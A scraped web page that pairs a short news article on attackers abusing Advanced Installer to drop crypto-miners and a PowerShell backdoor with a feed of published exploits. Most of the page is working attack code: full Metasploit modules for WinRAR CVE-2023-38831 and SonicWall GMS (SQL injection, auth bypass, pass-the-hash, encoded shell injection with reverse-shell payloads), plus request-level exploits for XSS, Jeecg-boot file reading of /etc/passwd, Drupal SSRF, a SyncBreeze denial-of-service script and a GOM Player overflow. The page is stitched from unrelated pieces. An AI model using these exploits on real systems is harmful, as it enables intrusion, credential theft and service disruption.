A legitimate Windows tool used for creating software packages called Advanced Installer is being abused by threat actors to drop cryptocurrency-mining malware on infected machines since at least November 2021.
"The attacker uses Advanced Installer to package other legitimate software installers, such as Adobe Illustrator, Autodesk 3ds Max, and SketchUp Pro, with malicious scripts and uses

A legitimate Windows tool used for creating software packages called **Advanced Installer** is being abused by threat actors to drop cryptocurrency-mining malware on infected machines since at least November 2021.

"The attacker uses Advanced Installer to package other legitimate software installers, such as Adobe Illustrator, Autodesk 3ds Max, and SketchUp Pro, with malicious scripts and uses Advanced Installer's Custom Actions feature to make the software installers execute the malicious scripts," Cisco Talos researcher Chetan Raghuprasad said in a technical report.

The nature of the applications trojanized indicates that the victims likely span architecture, engineering, construction, manufacturing, and entertainment sectors. The software installers predominantly use the French language, a sign that French-speaking users are being singled out.

This campaign is strategic in that these industries rely on computers with high Graphics Processing Unit (GPU) power for their day-to-day operations, making them lucrative targets for cryptojacking.

Cisco's analysis of the DNS request data sent to the attacker's infrastructure shows that the victimology footprint spans France and Switzerland, followed by sporadic infections in the U.S., Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore, and Vietnam.

The attacks culminate in the deployment of an M3\_Mini\_Rat, a PowerShell script that likely acts as a backdoor to download and execute additional threats, as well as multiple cryptocurrency-mining malware families such as PhoenixMiner and lolMiner.

As for the initial access vector, it's suspected that search engine optimization (SEO) poisoning techniques may have been employed to deliver the rigged software installers to the victim's machines.

The installer, once launched, activates a multi-stage attack chain that drops the M3\_Mini\_Rat client stub and the miner binaries.

"M3\_Mini\_Rat client is a PowerShell script with remote administration capabilities that mainly focuses on performing system reconnaissance and downloading and executing other malicious binaries," Raghuprasad said.

The trojan is designed to contact a remote server, although it's currently unresponsive, making it difficult to determine the exact nature of malware that may have been distributed through this process.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

The two other malicious payloads are used to illicitly mine cryptocurrency using the machine's GPU resources. PhoenixMiner is an Ethereum cryptocurrency-mining malware, while lolMiner is an open-source mining software that can be used to mine two virtual currencies at the same time.

In yet another case of legitimate tool abuse, Check Point is warning of a new type of phishing attack that leverages Google Looker Studio to create bogus cryptocurrency phishing sites in an attempt to sidestep protections.

"Hackers are utilizing it to create fake crypto pages that are designed to steal money and credentials," security researcher Jeremy Fuchs said.

"This is a long way of saying that hackers are leveraging Google's authority. An email security service will look at all these factors and have a good deal of confidence that it is not a phishing email, and that it comes from Google."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Weaponizing Legitimate Advanced Installer Tool in Crypto-Mining Attacks

This Metasploit module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'zip'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WinRAR CVE-2023-38831 Exploit',        'Description' => %q{          This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its          embedded document, the decoy document is executed, leading to code execution.        },        'License' => MSF_LICENSE,        'Author' => ['Alexander "xaitax" Hagenah'],        'References' => [          ['CVE', '2023-38831'],          ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],          ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']        ],        'Platform' => ['win'],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Targets' => [['Windows', {}]],        'Payload' => {          'DisableNops' => true        },        'DisclosureDate' => '2023-08-23',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),      OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])    ])    register_advanced_options([      OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil])    ])  end  def exploit    Dir.mktmpdir do |temp_dir|      output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])      input_file = datastore['INPUT_FILE']      decoy_name = File.basename(input_file)      decoy_ext = ".#{File.extname(input_file)[1..]}"      payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe'      decoy_dir = File.join(temp_dir, "#{decoy_name}A")      Dir.mkdir(decoy_dir)      payload_path = File.join(decoy_dir, payload_name)      File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }      bat_script = <<~BAT        @echo off        start "" "%~dp0#{payload_name}"        start "" "%~dp0#{decoy_name}"      BAT      bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")      File.write(bat_path, bat_script)      FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))      zip_path = File.join(temp_dir, 'template.zip')      Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|        zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))        zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)        zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)      end      content = File.binread(zip_path)      content.gsub!(decoy_ext + 'A', decoy_ext + ' ')      content.gsub!(decoy_ext + 'B', decoy_ext + ' ')      File.binwrite(output_rar, content)      print_good("Created #{output_rar}")    end  endend

WinRAR Remote Code Execution

This Metasploit module exploits a series of vulnerabilities - including auth bypass, SQL injection, and shell injection - to obtain remote code execution on SonicWall GMS versions 9.9.9320 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html  # We can actually use the title to identify which platform we're on  TITLE_WINDOWS = 'SonicWall Universal Management Host'  TITLE_LINUX = 'SonicWall Universal Management Appliance'  # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)  SECRET_KEY = '?~!@#$%^^()'  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sonicwall',        'Description' => %q{          This module exploits a series of vulnerabilities - including auth          bypass, SQL injection, and shell injection - to obtain remote code          execution on SonicWall GMS versions <= 9.9.9320.        },        'License' => MSF_LICENSE,        'Author' => [          'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis          'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis        ],        'References' => [          [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'],          [ 'CVE', '2023-34124'],          [ 'CVE', '2023-34133'],          [ 'CVE', '2023-34132'],          [ 'CVE', '2023-34127']        ],        'Privileged' => true,        'Targets' => [          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',                'WritableDir' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['win'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'WritableDir' => '%TEMP%'              }            }          ],          [            'Linux Command',            {              'Platform' => ['linux', 'unix'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/generic'              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-12',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'SSL' => true,          'RPORT' => '443'        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']),      ]    )    register_advanced_options([      # This varies by target, so don't define the default here      OptString.new('WritableDir', [true, 'A directory where we can write files']),    ])  end  def check    vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    # Basic sanity checks - the path should return a HTTP/200    return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?    return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200    # Ensure we're hitting plausible software    return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</    # Otherwise, probably safe?    CheckCode::Safe('Does not appear to be running SonicWall GMS')  end  # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 (auth bypass) to  # get a password hash  def get_password_hash    # attempt a sqli.    vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...')    # SQL injection question to fetch the admin password    query = "' union select " +            # This must be a valid DOMAIN, which we can thankfully fetch from the DB            '(select ID from SGMSDB.DOMAINS limit 1), ' +            # These fields don't matter            "'', '', '', '', '', " +            # This field is returned, so use it to get the id and password for our            # the super user, if possible            "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," +            # The rest of the fields don't matter, end with a single quote to finish with a clean query            "'', '', '"    vprint_status("Generated SQL injection: #{query}")    # We need to sign our query with the SECRET_KEY    token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query))    vprint_status("Generated a token using built-in secret key: #{token}")    # Build the URI    # Note that encoding space to '+' doesn't work, so we replace it with '%20'    uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20'))    # Do it!    print_status('Sending SQL injection request to get the username/hash...')    res = send_request_cgi(      'method' => 'GET',      'uri' => uri,      'headers' => {        'Auth' => '{"user": "system", "hash": "' + token + '"}'      }    )    # Sanity checks    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.empty?    # This field has the SQL injection response    hash = res.get_json_document['alias']    # If the server responds with an error, it has no 'alias' field so the key    # is missing entirely (this is where it fails against patched targets)    fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?    # If alias is present but contains nothing, that means our query got no    # results (probably there are no active users, or something?)    fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?    # If there's no ':' in the response, something super weird happened    fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')    username, hash = hash.split(/:/, 2)    print_good("Found an account: #{username}:#{hash}")    [username, hash]  end  # Exploits CVE-2023-34132 (pass the hash)  def authenticate(username, hash)    # Grab server hashing token    vprint_status('Grabbing server hashing token...')    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/appliance/login'),      'keep_cookies' => true    )    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Look for the getPwdHash function call, as it contains the token we need    if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?      fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')    end    server_token = ::Regexp.last_match(1)    vprint_status("Got the server-side token: #{server_token}")    # Generate the client_hash by combining the server token + the stolen    # password hash    client_hash = Digest::MD5.hexdigest(server_token + hash)    vprint_status("Generated client token: #{client_hash}")    # Send the token    print_status('Attempting to authenticate with the client token + password hash...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'login',        'clientHash' => client_hash,        'applianceUser' => username      }    })    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Check the title to make sure it worked    html = res.get_html_document    title = html.at('title').text    # We can identify the platform based on the title    if title == TITLE_LINUX      print_good("Successfully logged in as #{username} (Linux detected!)")      return Msf::Module::Platform::Linux    elsif title == TITLE_WINDOWS      print_good("Successfully logged in as #{username} (Windows detected!)")      return Msf::Module::Platform::Windows    end    fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")  end  def execute_command_windows(cmd)    vprint_status("Encoding (Windows) command: #{cmd}")    # While this is a shell command injection issue, an aggressive XSS filter    # prevents us from using a lot of important characters such as quotes and    # plus and ampersands and stuff. We can't even use Base64, because we can't    # use the + sign!    #    # We discovered that we could encode the command as integers, then use    # powershell to decode + execute it, so that's what this does.    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"    encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"    # Run the command    vprint_status("Running shell command: #{cmd}")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => 'C:\\GMSVP\\etc\\',        'searchFilter' => "|#{encoded_cmd}| rem "      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def execute_command_linux(cmd)    vprint_status('Encoding (Linux) payload')    # Generate a filename    payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")    # Wrap the command so we can execute arbitrary commands. There are several    # difficulties here, the first of which is that we don't have much in the    # way of tools. We're missing curl, wget, base64, python, ruby, even perl!    # The best tool I could find for staging a payload is uudecode, so we use    # that. (I noticed later that telnet exists, which could be another option)    #    # The good news is, with uudecode, we can send a base64 payload. The bad    # news is, we can't use '+', which means we can't use pure base64! To work    # around that, we replace '+' with '@', then use a bit of Bash magic to    # put it back! We also can't use quotes, so we have to do a mountain of    # escaping instead. The default shell is also /bin/sh, so we need to run    # bash explicitly for the `$()` substitutions to work.    cmd = [      # Build a command that runs in bash (but don't use quotes!)      'bash -c ',      # Escape all this for bash      Shellwords.escape([        # Use `uudecode` to get a '+' into a variable        "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);",        # Build a new uuencode file (encoded in base64) with the payload        "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n",        # Encode the payload as base64, but replace + with a variable        "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n",        # Pipe into uudecode        '==== | uudecode;',        # Run in the background with coproc        "coproc #{Shellwords.escape(payload_file)};",        # Delete the payload file        "rm #{payload_file}"      ].join)    ].join    # Run it!    vprint_status("Encoded shell command: #{cmd}")    print_status('Attempting to execute the shell injection payload')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => '/opt/GMSVP/etc/',        'searchFilter' => ";#{cmd}#"      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def exploit    # Get the password hash (from SQL injection + auth bypass)    username, hash = get_password_hash    # Use pass-the-hash to log in using that hash    detected_platform = authenticate(username, hash)    # Sanity-check the target    if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)      fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)")    end    # Generate a payload based on the target type    case target['Type']    when :cmd      my_payload = payload.encoded    when :dropper      my_payload = generate_payload_exe    else      fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")    end    # Run a command, using the platform specified in the target    if target.platform.platforms.include?(Msf::Module::Platform::Linux)      execute_command_linux(my_payload)    elsif target.platform.platforms.include?(Msf::Module::Platform::Windows)      execute_command_windows(my_payload)    else      fail_with(Failure::Unknown, "Unknown platform: #{platform}")    end  endend

Sonicwall GMS 9.9.9320 Remote Code Execution

The Microsoft Windows Kernel has an issue where a partial success of registry hive log recovery may lead to inconsistent state and memory corruption.

Microsoft Windows Kernel Recovery Memory Corruption

The Microsoft Windows Kernel suffers from out-of-bounds reads due to an integer overflow in registry .LOG file parsing.

Microsoft Windows Kernel Integer Overflow / Out-Of-Bounds Read

Event Ticketing System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Event Ticketing System-1.0 XSS-Reflected - RCE## Author: nu11secur1ty## Date: 09/08/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `id` request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload }}uypja"><script>alert(1)</script>k36c0 was submitted inthe id parameter. This input was echoed asuypja"><script>alert(1)</script>k36c0 in the application's response.The attacker can use this vulnerability to trick the user intoexecuting - opening the browser on his machine and opening a hazardousURL address.STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1694154671_204/index.php?controller=pjFront&action=pjActionCheckout&locale=1&id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplmHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7Origin: http://demo.phpjabbers.comReferer: http://demo.phpjabbers.com/Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Ticketing-System-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/event-ticketing-system-10-xss-reflected.html)## Time spent:01:25:00

Event Ticketing System 1.0 Cross Site Scripting

Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.

In the /testConnection route, a MySQL connection can be constructed to cause arbitrary file reading.

@PostMapping({"/testConnection"})
    public Result a(@RequestBody JmreportDynamicDataSourceVo var1) {
        Connection var2 = null;
        String var3 = var1.toString();
        a.info(" local cache key: " + var3);
        Object var4 = this.localCache.a(var3);
        if (g.d(var4)) {
            int var5 = g.e(var4);
            a.info(" local cache value: " + var5);
            if (var5 >= 3) {
                return Result.error("数据源已连接错误3次以上,请检查配置信息！");
            }

            if (var5 == 0) {
                return Result.OK("数据库连接成功", true);
            }
        } else {
            this.localCache.a(var3, 0, 3600000L);
        }

        try {
            Result var6;
            try {
                String var37 = var1.getDbType();
                Result var40;
                if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
                    boolean var39 = this.jmreportNoSqlService.testConnection(var1);
                    if (var39) {
                        var40 = Result.OK("数据库连接成功", true);
                        return var40;
                    } else {
                        this.localCache.a(var3, 1);
                        var40 = Result.error("数据库连接失败：错误未知");
                        return var40;
                    }
                } else {
                    Class.forName(var1.getDbDriver());
                    DriverManager.setLoginTimeout(60);
                    String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
                    var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
                    if (var2 == null) {
                        this.localCache.a(var3, 1);
                        var40 = Result.OK("数据库连接失败：错误未知", true);
                        return var40;

There is protection during the parsing process.

    public static String g(String var0) {
        if (a(var0, "mysql")) {
            if (var0.indexOf("allowLoadLocalInfile") > 0) {
                var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
            } else {
                var0 = var0 + "&allowLoadLocalInfile=false";
            }
        }

we can bypass it

POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{
    "id":"1",
    "code":"select \* from information\_schema.tables",
    "dbType":"jndi",
    "dbDriver":"com.mysql.cj.jdbc.Driver",
    "dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
    "dbName":"information\_schema",
    "dbUsername":"fileread\_/etc/passwd",
    "dbPassword":"password",
    "connectionTimaes":"5"
}

CVE-2023-41578: Jeecg-boot <=3.5.3 Arbitrary File Read · Issue #1 · Snakinya/Bugs

SyncBreeze version 15.2.24 suffers from a denial of service vulnerability.

    # Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service# Date: 30/08/2023# Exploit Author: mohamed youssef# Vendor Homepage: https://www.syncbreeze.com/# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe# Version: 15.2.24# Tested on: windows 10 64-bitimport socketimport timepyload="username=admin&password="+'password='*500+""request=""request+="POST /login HTTP/1.1\r\n"request+="Host: 192.168.217.135\r\n"request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"request+="Accept-Language: en-US,en;q=0.5\r\n"request+="Accept-Encoding: gzip, deflate\r\n"request+="Content-Type: application/x-www-form-urlencoded\r\n"request+="Content-Length: "+str(len(pyload))+"\r\n"request+="Origin: http://192.168.217.135\r\n"request+="Connection: keep-alive\r\n"request+="Referer: http://192.168.217.135/login\r\n"request+="Upgrade-Insecure-Requests: 1\r\n"request+="\r\n"request+=pyloadprint (request)s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.217.135",80))s.send(request.encode())print (s.recv(1024))s.close()time.sleep(5)

SyncBreeze 15.2.24 Denial Of Service

GOM Player version 2.3.90.5360 suffers from a buffer overflow vulnerability.

    # Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 30.08.2023# Vendor Homepage: https://www.gomlab.com# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Tested Version: 2.3.90.5360 (latest)# Tested on: Windows 11 64bit# Thanks to: M. Akil GÜNDOĞAN#  - Open GOM Player#  - Click on the gear icon above to open settings#  - From the menu that appears, select Audio#  - Click on Equalizer#  - Click on the plus sign to go to the "Add EQ preset" screen#  - Copy the contents of exploit.txt and paste it into the preset name box, then click OK#  - Crashed!#!/usr/bin/pythonexploit = 'A' * 260try:    file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC is not created")

GOM Player 2.3.90.5360 Buffer Overflow

Drupal version 10.1.2 appears to suffer from web cache poisoning due to a server-side request forgery vulnerability.

    ## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction## Author: nu11secur1ty## Date: 08/30/2023## Vendor: https://www.drupal.org/## Software: https://www.drupal.org/download## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http## Description:It is possible to induce the application to perform server-side HTTPrequests to arbitrary domains.The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com wassubmitted in the HTTP Host header.The application performed an HTTP request to the specified domain. Forthe second test, the attacker stored a responseon the server with malicious content. This can be bad for a lot ofusers of this system if the attacker spreads a malicious URLand sends it by email etc. By using a redirect exploit.STATUS: HIGH-Vulnerability[+]Exploit:```GETGET /drupal/web/?psp4hw87ev=1 HTTP/1.1Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.comAccept-Encoding: gzip, deflate, psp4hw87evAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,text/psp4hw87evAccept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36 psp4hw87evConnection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Origin: https://psp4hw87ev.pwnedhost.com```[+]Response from Burpcollaborator server:```HTTPHTTP/1.1 200 OKServer: Burp Collaborator https://burpcollaborator.net/X-Collaborator-Version: 4Content-Type: text/htmlContent-Length: 62<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>```[+]Response from Attacker server```HTTP192.168.100.45 - - [30/Aug/2023 05:52:56] "GET/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)## Time spend:03:35:00

Tag

#windows